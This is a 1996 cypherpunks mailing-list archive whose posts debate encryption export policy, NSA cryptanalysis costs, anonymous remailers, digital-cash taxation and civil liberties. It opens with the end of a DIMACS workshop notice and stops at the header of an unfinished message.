abstract (NOT A FULL PAPER) in ascii format to Joan Feigenbaum at
jf@research.att.com by September 1, 1996.  The Trust Management
workshop will be informal, and there are currently no plans to publish
proceedings.


For more information: 

If you would like to attend but not give a talk, contact Joan
Feigenbaum at jf@research.att.com any time before the beginning of
the workshop.  There is a small amount of support available for
people who do not have other sources of travel funds. 

Information about local arrangements, travel, lodging and registration
can be found at http://dimacs.rutgers.edu/Workshops/Management.
Those without WWW access can contact Pat Pravato at 908-445-5929 or
pravato@dimacs.rutgers.edu.

This workshop is part of DIMACS Special Year on Networks.
Information about the Special Year on Networks can be
found at DIMACS WWW site: http://dimacs.rutgers.edu or by
contacting the center.

   --------------------------------------------------------------------- 
The Special Year program is made possible by long term funding from the 
National Science Foundation, the New Jersey Commission on Science and 
Technology and DIMACS university and industry partners.

DIMACS Center; Rutgers University; P.O. Box 1179; Piscataway, NJ 08855-1179 
 TEL: 908-445-5928 FAX: 908-445-5932  **  EMAIL:  center@dimacs.rutgers.edu
 WWW:  http://dimacs.rutgers.edu **TELNET:  telnet info.rutgers.edu 90  

   DIMACS is a partnership of Rutgers University, Princeton University, 
         AT&T Research, Bellcore, and Lucent - Bell Laboratories.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 31 Jul 1996 20:23:11 +0800
To: cypherpunks@toad.com
Subject: Re: G7 Anti-Terrorism Reports [BRIEF]
Message-ID: <199607310938.FAA19962@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Jul 96 at 18:47, Jonathan M Summers wrote:

> Cypherpunks:
> 
> At 1735 CDT on Tuesday, July 30, 1996, CNN Atlanta during World News
> Tonight reported (in a _very_ brief flash) several "resolutions" adopted
> by the Group of Seven (G7) trade meeting in Paris.
> 
> At the bottom of the list of resolutions was to "prevent terrorist from
> using the Internet" (quote from CNN anchorwoman).

The Pacifica Report noted 'more controls on the Internet' and 
controlling the use of encryption, but didn't discuss this at length.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 31 Jul 1996 20:39:16 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Paranoid Musings
Message-ID: <199607310938.FAA19959@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Jul 96 at 11:13, Bill Frantz wrote:
[..]
> (1) Now everyone knows that 40 bit RC4 is weak, but just how weak is it? 

Differentiate between the cipher and the key-initialization.  There 
may be a flaw in how the key is set up that can make brute-force 
searches easier.  Known plaintext of a few headers may also help in 
guessing the s-box state, even if partially: combined with flaws in 
the key, this could be exploited, especially if one has a lot of 
experience and computing power handy.

[..]
> (2) What did Microsoft give up to export its crypto API?
> 
> Well, if you were a TLA, what would you want.  I think I would want an
> agreement to be able to insert my own code in that vendor's products.  Then
> I would be able to have widely distributed Trojan horses signed by the
> vendor.  I would have the opportunity to significantly weaken standardized
> crypto systems installed world wide.

Risky.  Code can always be reverse engineered.  If a flaw is 
exploited in too-strong an algorithm (3DES and 4k-bit RSA keys, for 
instance) to prosecute various people, somebody might notice. If US 
companies seem to magically have proprietary info from foreign 
companies, this would also be a sign of suspicion.   I think the
C[r]API will be used as a form of mandating GAK instead.

Rob





> 
> 
> Conspiracy theorists, start your mailers.
> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
> (408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
> frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA
> 
> 
> 
> 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 31 Jul 1996 22:14:35 +0800
To: cypherpunks@toad.com
Subject: Blaming the Internet for Terrorism
Message-ID: <199607311115.HAA20411@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


This comes from today's (Wed. July 31) LI Newsday, though the byline 
is the AP:

"Bombing Becoming All Too Popular"
The Associated Press

Washington - The number of Americans attacking and attempting to 
attack each other with bombs each year has nearly doubled this 
decade. For every Olympic park or Oklahamo City tragedy, police 
report dozens of foiled attempts where death and destruction are 
narrowly averted.

[..]
The rapid escalation poses a vexing problem for law enforcement. 
Unlike international terrorists with recognized agendas, these 
culprits are most often low-profile operators plotting in the privacy 
of back yards, garages and basements with easily obtained materials 
and simple instructions straight off the Internet.

[..]
In 1989, there were 1,699 criminal bombings attemted or carried out 
nationwide. By 1994, the last year with complete figures, the number 
has risen to 3,163, according to the Bureau of Alcohol, Tobacco, and 
Firearms.

Local cases, which seldom make national headlines, demonstrate the 
breadth of the threat.

[Examples follow...only one names the Internet:]

In Baton-Rouge, La., an 18-year-ooold dropout and two friends were 
indicted this month for stealing bomb-making materials from two 
high-school chemistry labs,  Court records allege the three plotted 
to blow up a train returning the young woman's parents from vacation 
to get insurance money, and had followed a terrorist handbook 
published on the Internet.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jul 1996 23:06:59 +0800
To: j ubois <jubois@netcom.com>
Subject: RE: A Libertine Question
In-Reply-To: <01BB7E76.400794E0@jubois3.mbaynet.com>
Message-ID: <Pine.SV4.3.91.960731083456.3161A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996, j ubois wrote:

> adjust your attitude with their billy club.***
> 
> Sounds consistent and rational to me. 


   Another 60's leftover.  It's almost August, go to your Rainbow Family 
gathering.

Do be careful, there are warrant checks on many of the incoming roads. 
Isn't it _so_ unjust, you're going to be held accountable for your deeds.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Brandon W. Wheaton" <kbwheaton@patrol.i-way.co.uk>
Date: Wed, 31 Jul 1996 20:00:17 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Securing 5% of the Internet against Wiretapping by Christmas (fwd)
Message-ID: <01BB7EC3.E6BA1D60@dynamic153.i-way.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Something I picked up from a mailing list called dc-stuff. <dc-stuff@fc.net> It's mostly having to do with security and hacking, thought not typically the "bad" sort. Thought it might not only be of interest the cypherpunks, but perhaps you could offer some hints, tips, advice??  

Cheers,
Bdog 


Date: Sat, 27 Jul 1996 16:24:52 -0700
From: John Gilmore <gnu@toad.com>
Subject: FW: Securing 5% of the Internet against Wiretapping by Christmas

I've been working on a project in secret for a few months, and now am
talking about it with everyone so that we can all help it along.

Want all the Internet traffic between you and every other
privacy-conscious site on the net, worldwide, to automatically be
encrypted using Triple-DES, RSA, and Diffie-Hellman?  Without changing
your hardware or software, except to stick a Linux PC on your network, or
install a new version of Linux on your laptop?  Want it all by Christmas?
Then check out

	http://www.cygnus.com/~gnu/swan.html

[...]

  -- John Gilmore
     An equal opportunistic encryptor







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Brandon W. Wheaton" <kbwheaton@patrol.i-way.co.uk>
Date: Wed, 31 Jul 1996 19:59:10 +0800
To: "'cypherpunks@toad.com>
Subject: FW: ANNOUNCEMENT: nym.alias.net enters beta testing (fwd)
Message-ID: <01BB7EC3.EC5C1200@dynamic153.i-way.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	William Knowles[SMTP:erehwon@c2.org]
Sent: 	Tuesday, July 30, 1996 5:54 PM
To: 	dc-stuff
Subject: 	ANNOUNCEMENT: nym.alias.net enters beta testing (fwd)


---------- Forwarded message ----------
Date: Tue, 30 Jul 1996 19:40:36 -0400 (EDT)
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
To: cypherpunks@toad.com, coderpunks@toad.com, remailer-operators@c2.org,
    mail2news@anon.lcs.mit.edu
Subject: ANNOUNCEMENT: nym.alias.net enters beta testing
Newsgroups: alt.privacy.anon-server

-----BEGIN PGP SIGNED MESSAGE-----

I'm pleased to announce that the nym.alias.net pseudonym server has
now entered the beta-testing phase, and seems quite stable.

Nym.alias.net offers several interesting features:

  * Public-Key encryption of all received mail.  Once mail has gone
    through nym.alias.net, no one can read it except you--even if you
    have been sending your mail to a newsgroup and your reply-block
    and remailers become compromised.

  * Support for multiple, probabilistically-weighted, reply blocks.
    These can be used for redundancy or to foil traffic analysis with
    decoys.

  * Replay detection.  This foils replay attacks, but can also be used
    for higher reliability if you send redundant copies of a message
    through different remailer chains.

  * An option to receive only fixed-length messages (by splitting up
    large messages and padding small ones with garbage).

  * An option to sign mail you send with the remailer's public key, so
    as to give some assurance of authenticity without having to
    publish your own PGP public key.

  * Support for finger [pending DNS approval].  You can choose to make
    your nym's PGP public key available to all who finger its E-mail
    address.  Right now you can test this by fingering at 18.26.0.252.

In addition, experimental nym.alias.net support for Premail is now
available (in the form of a patch to premail 0.44).  With this patch,
premail will store your nym's PGP key on encrypted keyrings.  This
allows you to publish a PGP key for your pseudonym without the danger
of your identity being revealed to someone with access to your main
PGP keyrings (or a backup copy of them).

To obtain more information about nym.alias.net, finger
<nymhelp@anon.lcs.mit.edu> or send mail to <help@nym.alias.net>.  To
get information about using premail with nym.alias.net, finger
<premail-info@anon.lcs.mit.edu> or send mail to
<premail-info@nym.alias.net>.

These documents are also available on the new nym.alias.net web page:
    http://www.cs.berkeley.edu/~raph/n.a.n.html

Please report all bugs to <admin@nym.alias.net>.  I'll also be glad to
consider feature requests, particularly from anyone interested in
developing any more client software.

Enjoy!

mix-admin@anon.lcs.mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf6dcUTBtHVi58fRAQE4NgP/SoKSqHxobEHuyWl6lXVAHgk9yqNS/WAD
jUfKYGodThr93kJZkmreyIHrWgbromJJlXo6MPq9KpZzIh85uHRzBPRSh293hfUo
ta8/sdZsW1+uoEkAs8JUWlwAEGo+bfmgRnFswf80pAPClpbGo52DAKyLKfdCaFps
kQ+4hoouUvo=
=qEWa
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jul 1996 12:46:10 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
Message-ID: <ae24122000021004fdeb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 7/30/96, Lucky Green wrote:
>At 6:17 7/30/96, Igor Chudov @ home wrote:
>[...]
>>Another alternative that I see is property taxes and poll taxes,or
>>taxes on some commodities such as oil. But incomes seem to be hard to
>>track.
>
>What you also will see is an increase in sales tax. You still got to buy
>groceries locally.

In the spirit of looking for points to quibble about:

* food is mostly exempt from sales taxes, in most states in the U.S. Expect
a major protest if a loaf of bread incurs a sales tax--I don't expect it
anytime soon.

* booze has a high tax rate, in excise taxes which can account for as much
as 40% of the final price, plus sales tax. If the tax rises much higher,
expect increased black market sales.

* electronic and computer goods are often untaxed because many order them
via mail-order. There have been proposals to tax out-of-state purchases,
but the logistics and legal issues are murky (who gets the tax? and why
should Idaho, for example, get the tax revenue for an item ordered from
Georgia?).

Of course, I'm not an expert in answering Igor's original question about
where the taxes will come from. I'm more interested in reducing them, not
raising them.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 31 Jul 1996 23:43:02 +0800
To: cypherpunks@toad.com
Subject: Crypto Law and Veincheck
Message-ID: <199607311222.MAA14643@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.ispo.cec.be:81/ispo/lists/ispo/0464.html   
 
---------- 
 
 
European Crypto Law information sources   
 
 
Robert Horvitz (horvitzr@omri.cz)  
Tue, 21 May 1996 13:22:59 +1GMT  
 
 
Reply to aadamski@cc.uni.torun.pl (Andrzej Adamski) who said:   
 
 
My name is Andrzej Adamski, I'm from Poland, Nicolas Copernicus University
. I would be very grateful for getting hints where to find  information on
the current EU encryption policy/ legislation.  What about present
developments in the area of the European  infrastructure of pubic (sic) key
look like?   
 
 
------------------------------------------------------------   
 
 
Adam, the best place to start your research is at the "Cryptography in
Europe" website:  
 
 
http://www.modeemi.cs.tut.fi/~avs/eu-crypto.html  
 
 
To see the wider context, visit the "Crypto Law Survey" website  created by
Bert-Jaap Koops in the Netherlands, at:  
 
 
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm  
 
 
The EU and EC seem likely to cave in to pressure (blackmail?) from the
American  
spy agencies and impose "back doors" on any  strong encryption package.
Unless Europeans stand up and insist that privacy of communication is an
essential human right.  
 
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
Robert Horvitz, International Coordinator, OSI Internet Program Motokov
Building - Room 518, Na Strzi 63, 140 62 Praha 4, Czech Rep., tel 42 2
6114-2751, fax 6114-2750, email  
horvitzr@omri.cz 
 
 
---------- 
 
 
For more on cryptography and encryption, see the IPO search page at: 
 
 
     http://www.ispo.cec.be/topic/simple.html  
 
 
As an example, for artful use of crypto, see the "veincheck" proposal at: 
 
 
    http://www.ispo.cec.be:81/ispo/lists/ispo/0252.html   
 
  
Social Applications of Biometrics  
 
  
Joe Rice (joerice@innotts.co.uk)  
Tue, 26 Mar 1996 21:28:20 -0800   
  
  
I would welcome some input to shape the following IT technology. The
technology is a physiological biometric based upon the detection and
comparison of subcutaneous blood vessels, essentially bar-code reading of
people.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jul 1996 13:23:26 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
Message-ID: <ae241838010210046c83@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 PM 7/30/96, Sandy Sandfort wrote:

>On Tue, 30 Jul 1996, jim bell wrote:
>
>> Even if not, chances are good that "all" of the transactions
>> can be linked together, even if they can't be directly linked
>> to an identifiable person.   Doesn't sound too promising.
>
>It sounds VERY promising to me.  Though I'm sure Jim's conjecture
>about linking transactions is correct, I don't see how such an
>aonymous payment system could not be useful in preserving privacy.
>One could purchase several of these cards--preferably in the
>smallest denominations consistent with their mission.  Each card
>could be used so that its audit trail left whatever impression
>one wished to leave.

I'm also skeptical of these "VISA Travel Money" cards. That is, they don't
seem to be too useful for anything.

After all, cash works well. (It's rarely stolen, in my experience, or at
least this is not a major concern. Traveller's checks work well, and can be
"cashed" into the local currency. ATM machines fill the same function these
"VISA Travel Money" cards apparently do; at least when I was in Europe the
last time this is what I used, and my French francs were as untraceable as
could be.

As I see it, yet another marketing solution looking for a problem.

A real step would be a true privacy card, a card issued in a jurisdiction
unfriendly to U.S. investigators and offering various transaction-blinding
options. I have to wonder what pressures have been put on the major credit
card companies...

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 31 Jul 1996 23:27:27 +0800
To: cypherpunks@toad.com
Subject: Re: crypto CD source
Message-ID: <199607311213.OAA19633@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <16689.9607301944@exe.dcs.exeter.ac.uk> you wrote:

: Some time ago on the list there was some discussion of putting
: together a CD full of cryptographic software and reference material.
: Nothing came of it, but I think several people expressed an interest,
: for those of you who were interested, take a look at:

: 	http://www.sevenlocks.com/

[..]
: They have a large supply of crypto software available on-line as well.
: (No mention of ITAR on their software down load pages (78 Mb of
: security related software they claim), and it looks you could download
: the lot even if you weren't in the US).

ftp.replay.com has 220 Mb of crypto software available for download
at no charge ....

bEST Regards,
--
  Alex de Joode  | Replay IP Service & Web DZign  --  The Netherlands
usura@replay.com | http://www.replay.com       mailto:info@replay.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jul 1996 15:04:37 +0800
To: cypherpunks@toad.com
Subject: Re: You know it's getting late when... (fwd)
Message-ID: <ae243935020210042ce4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:24 AM 7/31/96, Jim Choate wrote:

>Consider (to some) a trivial example. There are 20 million cats and dogs
>killed each year because somebody was irresponsible. The vast majority of
>these are or were pets (not feral or wild animals as some would claim) which
>persons simply didn't want anymore. Now there is somewhere around 250
>million people in the US. This means that 1 out of 10 (roughly) are costing
>the rest of us about $50 ea. to take care of their pet 'problem'.
>
>I see no difference in having my money taken via taxes (where most of it
>comes from) for this than having somebody come and take $50 for whatever
>reason by kicking my front door in. Why am I being forced to pay this money
>to pay for somebody elses lack of discipline and simple human empathy?

I agree, and this is one reason I am opposed to State-sponsored canine and
feline genocide.

And historically the lack of canine eradication programs has been a major
way to control the "homeless problem," so the State is making the homeless
problem worse by removing natural pest control mechanisms.

--Klaus






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jul 1996 16:31:48 +0800
To: cypherpunks@toad.com
Subject: FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <ae2444b503021004e0a3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:05 AM 7/31/96, Bill Frantz wrote:
>I'm really feeling much better now :-).

I guess Ritalin really does work.


>How many encrypted messages do you think NSA wants to read?  I have no idea
>either, but in the spirit of never depend on expert opinion when simple
>arithmetic will do, let's assume a world where major email packages use
>encryption as a matter of course.  If we assume that the 30 million net
>users send one email/day, then that results in about 350/second.  If I
>assume your "several thousand" is 2000, then we need a machine with 700,000
>FPGA's.  Given Matt Blaze et. al.'s estimate of $10/chip complete, that is
>$7 million.  However if you take the NSA's estimate (in their response to
>Blaze et al) of $1000/chip, then you get $700 million.

I for one don't have any way of estimating how many messages they might
want to read. But note some figures we've discussed here before:

* NSA spent upwards of $100 M to build the "Harvest" machine in the late
50s and early 60s (you worked with Norm Hardy, Bill, so you undoubtedly
know about this). Some of this machine's capacity was for cryptanalysis,
some for voice analysis, and no doubt a lot for other things. But it says
something about the kinds of money that will be spent.

* Spysats routinely cost a billion dollars or more. (A single launch of the
space shuttle costs at least $500 M, as I recall. Some shuttle launches
have been to deploy SIGINT sats.)

* The NSA was one of the main investors in several high tech companies,
including Control Data Corporation and Cray Research.

I conclude, roughly speaking, that spending $100 M on a specialized machine
to break RC4 or any other modern cipher (that is breakable at the key
lengths used) would not even give them pause.

>If we assume a machine designed to break *every* message, NSA's response
>makes more sense.  From their response (reordered):

I don't believe that even _they_ would plan for something like this, unless
RC4 is a lot weaker than experts seem to think it is.

[stuff elided]

>>  o As more and more chips are added to a machine, two effects occur:
>>
>>      o Interconnections increase and increase running time;
>>      o Heat from the chips eventually limit [sic] the size of a
>>        machine.
>Fast machines produce a lot of heat.

But, as many have pointed out, this is not a realistic limit. The pieces of
the solution could be scattered from one end of Fort Meade to another, and
still not be affected much by communications costs and delays. Power
density is thus not going to be a problem. (A calculation can be done on
how long it will take before electricity costs exceed chip costs...I
haven't done this for the crypto FPGAs, as so many things are unclear about
what they might be, but for the 200 MHz Pentium (CPU alone, not a system) I
get: 40 kilowatt-hours per year x $0.10 per KWH = $4 per year in
electricity costs. Heat removal costs are comparable.)

FPGAs and custom chips will not be much different. I conclude that the
costs of building the chips and system will be orders of magnitude more
expensive than the costs of running the chips with power, and that removing
the heat is not an issue. (Spread out enough, simple heat removal a la
office computers is fine. Leaving windows open is even cheaper ;-))


>Now I have no problem with believing NSA would invest $7 million.  However,
>$700 million makes me wonder.  With FPGAs, there is a significant risk that
>people will change the crypto system and make the investment worthless.
>(Which, I guess, is why they prefer general purpose computers.)  However,
>if they can get the equivalent of a few bits of key back by cryptanalysis,
>then they knock the costs down to entirely reasonable (for them) levels.

An FPGA is field-programmable. (FPGA = Field Programmable Gate Arrays) The
Xilynx and Altera lines of FPGAs could be reconfigured for other
algorithms, surely. (I recall several preliminary designs discussed in
various places.)

This doesn't mean they've done it, only that they could buy millions of
FPGAs for the cost of a single spysat or shuttle launch. So, it seems
likely.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Wed, 31 Jul 1996 14:24:31 +0800
To: cypherpunks@toad.com
Subject: Re: RPK Public Key Cryptography
Message-ID: <199607310421.QAA09064@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Tall men in dark suits made Stephen Cobb <stephen@iu.net> write:
 
>My apologies to the list if this subject is old hat but someone just pointed
>me to the RPK Public Key Cryptography site and I was wondering what people
>thought of this particular technology.
 
It's just Yet Another PKC.  Look at the history of LUC for a similar example:
An amazing new breakthrough in PKC is announced, after a couple of years of
analysis by cryptographers it's found to be no better or worse than existing
PKC's, but in any case noone uses it because the existing patent covers only
the US and expires in a few years whereas the LUC ones cover much of the world
and will be around for ages.  RPK is a similar case (actually it's in a
somewhat worse position, by the time it's been subjected to enough analysis for
people to trust it, the RSA patent will have expired, making RPK unmarketable). 
Other comments on the system:
 
 - The inventor apparently has no plans to publish details on the system in a
   journal or present it at a conference for peer review.
 
 - Someone who used to work with him rates him as a fairly competent
   programmer.  His crypto skills are unknown.
 
Given what happened with LUC I predict more of the same for RPK.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 1 Aug 1996 00:19:09 +0800
To: cypherpunks@toad.com
Subject: Re: New Clinton (anti-) Encryption Policy nnn
Message-ID: <199607311128.EAA03330@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



> CLINTON ADMINISTRATION FACT SHEET: U.S. CRYPTOGRAPHY POLICY (Industry,
> international cooperation urged)
> Following is the text of the fact sheet:
kersnip
> Militia groups advise their members to use encryption to hide illicit
> weapons, financial, and other criminal activities.
Using encryption to hide illicit weapons? I think somebodys
been watching too much TV.
VR Troopers Transform!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 1 Aug 1996 01:27:40 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: A Libertine Question
Message-ID: <2.2.32.19960731130157.0069c420@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:50 PM 7/30/96 -0700, Mike Duvos wrote:
>Alan Horowitz writes:
>> On Mon, 29 Jul 1996 jbugden@smtplink.alis.ca wrote:
>> 
>> > Think of how many of our laws are being enacted that tacitly make being
>> > poor or indigent a crime.
>> 
>>    Horseshit. This is a poorly-disguised re-tread of one of the standard 
>> lines of the Patrice Lumumba University brand of leftist agitprop.
>
>Here in Seattle, we have an city attorney who specializes in creating
>ordinances to annoy and harrass the underclass, often paving new roads
>over former civil liberties in the process.

The process of regulatory torment of homeless folks is divisible into two
methods: restriction of anonymous behavior (e.g., travel, public speech,
business transactions), and restriction of behavior to property-owners
(sleeping, eating, assembly, recreation).

The former is or should be disturbing to crypto-anarchy friendly folks
because it limits the ability of every person to travel or make purchases or
otherwise engage in economic activity anonymously.

The latter should be disturbing to crypto-anarchy friendly folks because of
the relationship between physical presence and regulatory jurisdiction - a
government which requires you to establish your relationship to something
valuable within its jurisdiction (like a car or real estate) before allowing
you to exercise human/economic rights effectively establishes its ability to
regulate you by seizing or otherwise burdening your relationship with your
possession.

In practice, the no-anonymity requirement is frequently conflated with the
latter, in that demonstrating your relationship to valuable property implies
susceptibility to punishment (and/or sufficient
socialization/indoctrination) and long-term presence for later enforcement,
such that a request for identification (with corresponding dossier check for
previous instances of "antisocial" behavior) is likely to be unnecessary or
penologically nonproductive. Which is a long way to say that street cops
don't usually torment people with nice cars and/or houses, so those folks
don't need to be so concerned about making sure their "papers" are "in
order". So the unconstitutional and oppressive character of the various laws
Mike Duvos refers to is mitigated by their lack of evenhanded enforcement.
If a cop can demand ID from someone who "looks like he doesn't belong here"
he can demand it from you. (modulo driving, this isn't legal. But give
Justice [sic] Rehnquist and Clinton and random congressional maniacs a few
more years and see where things stand.)

Both requirements are reducible to the notion that a person must be
punishable before they may act - in the extreme case, a person must be
punishable before they will be allowed to exist. I find it very difficult to
harmonize this position with the idea that governments exist to serve
people, not the other way around. But maybe I just don't have my head right. 

Because homelessness itself is not inherently problematic (or easily
distinguishable from "legitimate" activity), it's difficult to define it as
a crime beyond Mr. "strong libertarian [sic]" Horowitz' "threat to public
order and decorum". Cities have learned to regulate everyday activities
since those are the only ones they're certain homeless people will engage
in. Police officers have, in general, the good sense to avoid applying these
regulations to people who look like they don't present a threat to "public
order and decorum". Today those laws are applied to people who may smell bad
and don't want traditional jobs. Tomorrow they may be applied to people who
won't use only government-approved crypto or who want to defend themselves
with guns or other weapons. And just as some people "don't have a right to
live in Seattle" if they won't toe the line, other people may find they
"don't have a right to live in the United States." * 

(* Other people (apparently not "strong libertarians") buy into all of that
suspicious crap about the Bill of Rights and people being allowed to be
themselves even if other people find it upsetting or non-decorous. But they
probably don't appreciate how difficult it is to be a policeman, so we'll
just ignore them, they're probably leftists. If they don't like how things
go here, they can just get the hell out, hmm? Banning T-shirts with crypto
code printed on them - that's one thing. But banning ratty old T-shirts that
haven't been washed is totally different.) 

The regulation of ordinary social and economic activity is not a
"homelessness issue", it's a "freedom issue". If you admit that it can
legitimately be regulated but reassure yourself with your trust in the
discretion and good judgement of the regulators, your liberty is more a
matter of grace than of right. Have a nice day.  
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Kline <dkline@well.com>
Date: Thu, 1 Aug 1996 03:00:17 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Dry Under the Waterfall
In-Reply-To: <199607302312.QAA28523@netcom6.netcom.com>
Message-ID: <Pine.SOL.3.91.960730163830.8327A-100000-100000-100000@well>
MIME-Version: 1.0
Content-Type: text/plain


This is apparently some kind of list. Please take me off it.

Thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Thu, 1 Aug 1996 03:20:56 +0800
To: cypherpunks@toad.com
Subject: re:WaPo on Crypto-Genie Terrorism
Message-ID: <v03007805ae253702da4f@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


here is something my girlfriend sent me the other day, after reading the
Klinton-Antifreedom/terror news

Setting: Germany in the late 30's. Quote from "Stones from the River", by
Ursula Hegi.

I think this rings true for our country today. The tragic reality is that
the majority of people have simply forgotten the urge to question what they
read in the news.


"The people of Burgdorf went to parades and speeches--some because they
genuinely believed in their leaders; others, because not to go would call
attention to themselves.  Most practiced the silence they were familiar
with, a silence nurtured by fear and complicity that would grow beyond
anything they could imagine, mushrooming into the decades after the war
which, some began to fear, was about to happen.

To justify this silence, they tried to find the good in their government or
fled into the mazes of their own lives, turning away from the community.
They knew how not to ask questions; they had been prepared for it by
government and church. Over the years, they had forgotten that early urge
to question."

Vinnie Moscaritolo
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A
------------------
"And someone said Hey man did ya see that?
   His body hit the street with such a beautiful thud..
I wonder if he knew what he was getting into...
  Or was he just lost in the flood?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TQDB <tqdb@daffy.fn.net>
